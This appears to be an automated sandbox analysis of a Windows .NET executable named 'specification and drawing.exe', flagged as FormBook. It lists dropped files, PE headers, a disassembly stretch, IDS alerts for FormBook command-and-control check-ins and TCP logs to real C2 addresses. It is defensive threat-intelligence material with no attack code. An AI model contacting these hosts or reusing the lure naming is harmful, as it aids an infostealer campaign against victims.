                                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                        Malicious:true
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1172
                                                                                                        Entropy (8bit):5.354777075714867
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:3gWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:QWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                                                        MD5:92C17FC0DE8449D1E50ED56DBEBAA35D
                                                                                                        SHA1:A617D392757DC7B1BEF28448B72CBD131CF4D0FB
                                                                                                        SHA-256:DA2D2B57AFF1C99E62DD8102CF4DB3F2F0621D687D275BFAF3DB77772131E485
                                                                                                        SHA-512:603922B790E772A480C9BF4CFD621827085B0070131EF29DC283F0E901CF783034384F8815C092D79A6EA5DF382EF78AF5AC3D81EBD118D2D5C1E623CE5553D1
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                        Category:dropped
                                                                                                        Size (bytes):196608
                                                                                                        Entropy (8bit):1.1239949490932863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                        MD5:271D5F995996735B01672CF227C81C17
                                                                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                        Malicious:false
                                                                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Entropy (8bit):7.844246147104084
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                        File name:specification and drawing.exe
                                                                                                        File size:917'504 bytes
                                                                                                        MD5:8941cbf2cdd44ecfe97f45a2fed0d94f
                                                                                                        SHA1:3dbed0eb010422bf5cd364da77e6f22abc27439c
                                                                                                        SHA256:d785e400857a1fea973e9b1fdff8d1a31c4ffdf0aec99bcddf19a2107b230849
                                                                                                        SHA512:9f037294a4a2a0084e186a9eea86eed6b1bbb41f2ddb34f1ded9d86c7e6eddf9c8ef3bdd92198440e6291101693354c63e7e850094d0a3bd5f0caab12219b85c
                                                                                                        SSDEEP:24576:t2xjENP6PYm47hq1wHfA1L1i46xN9LCnYn5:AKa3eH41L1cx6nY
                                                                                                        TLSH:0515126412CFE506C8E217740C67E2F466748D89ED12C31B6BEABEEF7D7A11625803E1
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Gg..............0......\........... ........@.. .......................`............@................................
                                                                                                        Icon Hash:099bce4dd131078e
                                                                                                        Entrypoint:0x4dc09a
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x6747D216 [Thu Nov 28 02:14:46 2024 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:4
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:4
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:4
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                        Instruction
                                                                                                        jmp dword ptr [00402000h]
                                                                                                        adc dword ptr [eax], eax
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [esi], bh
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax+00h], al
                                                                                                        add byte ptr [eax], al
                                                                                                        push edi
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [ebp+00h], bl
                                                                                                        add byte ptr [eax], al
                                                                                                        pop edi
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [edx+00h], ah
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [esi], cl
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [edi], bl
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [edx], ch
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax+eax+00h], dl
                                                                                                        add byte ptr [ebx+00h], al
                                                                                                        add byte ptr [eax], al
                                                                                                        pop ebx
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax+eax+00h], ah
                                                                                                        add byte ptr [ecx], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax+eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        or dword ptr [eax], eax
                                                                                                        add byte ptr [eax], al
                                                                                                        adc eax, 1C000000h
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [ebx], dh
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [edi+00h], al
                                                                                                        add byte ptr [eax], al
                                                                                                        push eax
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [edi], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [edx], ah
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [ebx], dl
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax+eax], bh
                                                                                                        add byte ptr [eax], al
                                                                                                        sbb byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        dec ecx
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [ebx+00h], cl
                                                                                                        add byte ptr [eax], al
                                                                                                        dec edi
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xdc0480x4f.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xde0000x59f4.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xe40000xc.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x20000xda1200xda20082c017ff6006b214a0db1c628d925ba2False0.9286286712034384data7.845321462695301IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rsrc0xde0000x59f40x5a001a4d21e7124dac61ea20b702e2afa16dFalse0.9310763888888889data7.85812939228354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0xe40000xc0x200b1b29c65337701b07f557df7ec198b13False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_ICON0xde1000x531aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.968083106138949
                                                                                                        RT_GROUP_ICON0xe342c0x14data1.05
                                                                                                        RT_VERSION0xe34500x3a4data0.4366952789699571
                                                                                                        RT_MANIFEST0xe38040x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                        DLLImport
                                                                                                        mscoree.dll_CorExeMain
                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-12-02T14:37:23.348290+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649786185.106.176.20480TCP
                                                                                                        2024-12-02T14:37:40.431518+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498233.33.130.19080TCP
                                                                                                        2024-12-02T14:37:40.431518+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.6498233.33.130.19080TCP
                                                                                                        2024-12-02T14:37:43.060663+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498313.33.130.19080TCP
                                                                                                        2024-12-02T14:37:45.767106+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498373.33.130.19080TCP
                                                                                                        2024-12-02T14:37:48.438381+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6498433.33.130.19080TCP
                                                                                                        2024-12-02T14:38:03.860734+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498785.39.10.9380TCP
                                                                                                        2024-12-02T14:38:06.522400+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498855.39.10.9380TCP
                                                                                                        2024-12-02T14:38:09.244441+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498905.39.10.9380TCP
                                                                                                        2024-12-02T14:38:11.840591+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6498955.39.10.9380TCP
                                                                                                        2024-12-02T14:38:20.003806+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649912194.58.112.17480TCP
                                                                                                        2024-12-02T14:38:22.741439+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649919194.58.112.17480TCP
                                                                                                        2024-12-02T14:38:25.323599+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649925194.58.112.17480TCP
                                                                                                        2024-12-02T14:38:28.045617+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649932194.58.112.17480TCP
                                                                                                        2024-12-02T14:38:34.909485+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649948209.74.64.18780TCP
                                                                                                        2024-12-02T14:38:37.535393+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649956209.74.64.18780TCP
                                                                                                        2024-12-02T14:38:40.199515+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649962209.74.64.18780TCP
                                                                                                        2024-12-02T14:38:42.952516+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649968209.74.64.18780TCP
                                                                                                        2024-12-02T14:38:49.826932+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499853.33.130.19080TCP
                                                                                                        2024-12-02T14:38:52.740601+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499923.33.130.19080TCP
                                                                                                        2024-12-02T14:38:55.123139+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499993.33.130.19080TCP
                                                                                                        2024-12-02T14:38:57.778717+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500053.33.130.19080TCP
                                                                                                        2024-12-02T14:39:04.698870+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500113.33.130.19080TCP
                                                                                                        2024-12-02T14:39:07.450410+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500123.33.130.19080TCP
                                                                                                        2024-12-02T14:39:10.033043+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500133.33.130.19080TCP
                                                                                                        2024-12-02T14:39:12.753071+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500143.33.130.19080TCP
                                                                                                        2024-12-02T14:39:19.685126+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500153.33.130.19080TCP
                                                                                                        2024-12-02T14:39:22.359225+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500173.33.130.19080TCP
                                                                                                        2024-12-02T14:39:25.072867+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500183.33.130.19080TCP
                                                                                                        2024-12-02T14:39:27.662406+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500193.33.130.19080TCP
                                                                                                        2024-12-02T14:39:35.541607+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002047.238.157.25380TCP
                                                                                                        2024-12-02T14:39:38.213543+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002147.238.157.25380TCP
                                                                                                        2024-12-02T14:39:40.885385+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002247.238.157.25380TCP
                                                                                                        2024-12-02T14:40:03.919439+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65002347.238.157.25380TCP
                                                                                                        2024-12-02T14:40:10.782145+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002567.223.117.16980TCP
                                                                                                        2024-12-02T14:40:13.518956+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002667.223.117.16980TCP
                                                                                                        2024-12-02T14:40:16.194628+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002767.223.117.16980TCP
                                                                                                        2024-12-02T14:40:18.811723+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65002867.223.117.16980TCP
                                                                                                        2024-12-02T14:40:26.244876+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002985.159.66.9380TCP
                                                                                                        2024-12-02T14:40:28.917219+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003085.159.66.9380TCP
                                                                                                        2024-12-02T14:40:31.588702+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003185.159.66.9380TCP
                                                                                                        2024-12-02T14:40:34.109265+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65003285.159.66.9380TCP
                                                                                                        2024-12-02T14:40:41.494889+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650033162.159.140.10480TCP
                                                                                                        2024-12-02T14:40:44.683670+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650034162.159.140.10480TCP
                                                                                                        2024-12-02T14:40:48.511975+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650035162.159.140.10480TCP
                                                                                                        2024-12-02T14:40:51.358045+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650036162.159.140.10480TCP
                                                                                                        2024-12-02T14:40:58.451663+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650037208.91.197.2780TCP
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 2, 2024 14:37:21.697105885 CET4978680192.168.2.6185.106.176.204
                                                                                                        Dec 2, 2024 14:37:21.817025900 CET8049786185.106.176.204192.168.2.6
                                                                                                        Dec 2, 2024 14:37:21.817106009 CET4978680192.168.2.6185.106.176.204
                                                                                                        Dec 2, 2024 14:37:21.827713013 CET4978680192.168.2.6185.106.176.204
                                                                                                        Dec 2, 2024 14:37:21.947699070 CET8049786185.106.176.204192.168.2.6
                                                                                                        Dec 2, 2024 14:37:23.348037004 CET8049786185.106.176.204192.168.2.6
                                                                                                        Dec 2, 2024 14:37:23.348114967 CET8049786185.106.176.204192.168.2.6
                                                                                                        Dec 2, 2024 14:37:23.348289967 CET4978680192.168.2.6185.106.176.204
                                                                                                        Dec 2, 2024 14:37:23.351816893 CET4978680192.168.2.6185.106.176.204
                                                                                                        Dec 2, 2024 14:37:23.499305010 CET8049786185.106.176.204192.168.2.6
                                                                                                        Dec 2, 2024 14:37:39.162432909 CET4982380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:39.282707930 CET80498233.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:39.282843113 CET4982380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:39.299262047 CET4982380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:39.419570923 CET80498233.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:40.431355000 CET80498233.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:40.431518078 CET4982380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:40.825304031 CET4982380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:40.946366072 CET80498233.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:41.841552973 CET4983180192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:41.961766005 CET80498313.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:41.961899042 CET4983180192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:41.976974010 CET4983180192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:42.096906900 CET80498313.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:43.060523033 CET80498313.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:43.060662985 CET4983180192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:43.478974104 CET4983180192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:43.598963022 CET80498313.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:44.504175901 CET4983780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:44.624495983 CET80498373.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:44.624654055 CET4983780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:44.639585018 CET4983780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:44.760024071 CET80498373.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:44.760076046 CET80498373.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:45.766944885 CET80498373.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:45.767106056 CET4983780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:46.150682926 CET4983780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:46.270759106 CET80498373.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:47.170320988 CET4984380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:47.290412903 CET80498433.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:47.290610075 CET4984380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:47.302540064 CET4984380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:47.422590971 CET80498433.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:48.437875032 CET80498433.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:48.438294888 CET80498433.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:48.438380957 CET4984380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:48.440932035 CET4984380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:48.561801910 CET80498433.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:02.402349949 CET4987880192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:02.522756100 CET80498785.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:02.522831917 CET4987880192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:02.538472891 CET4987880192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:02.658472061 CET80498785.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:03.860548973 CET80498785.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:03.860634089 CET80498785.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:03.860733986 CET4987880192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:04.041325092 CET4987880192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:05.060825109 CET4988580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:05.181015015 CET80498855.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:05.181138039 CET4988580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:05.197454929 CET4988580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:05.317645073 CET80498855.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:06.522099018 CET80498855.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:06.522336006 CET80498855.39.10.93192.168.2.6
